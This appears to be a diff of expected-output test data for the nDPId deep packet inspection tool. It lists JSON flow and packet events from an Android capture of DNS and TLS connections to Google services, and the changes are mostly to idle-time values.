00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,goog
lecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WIT
H_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} 
+00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": 
{"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} -00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} 
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} 
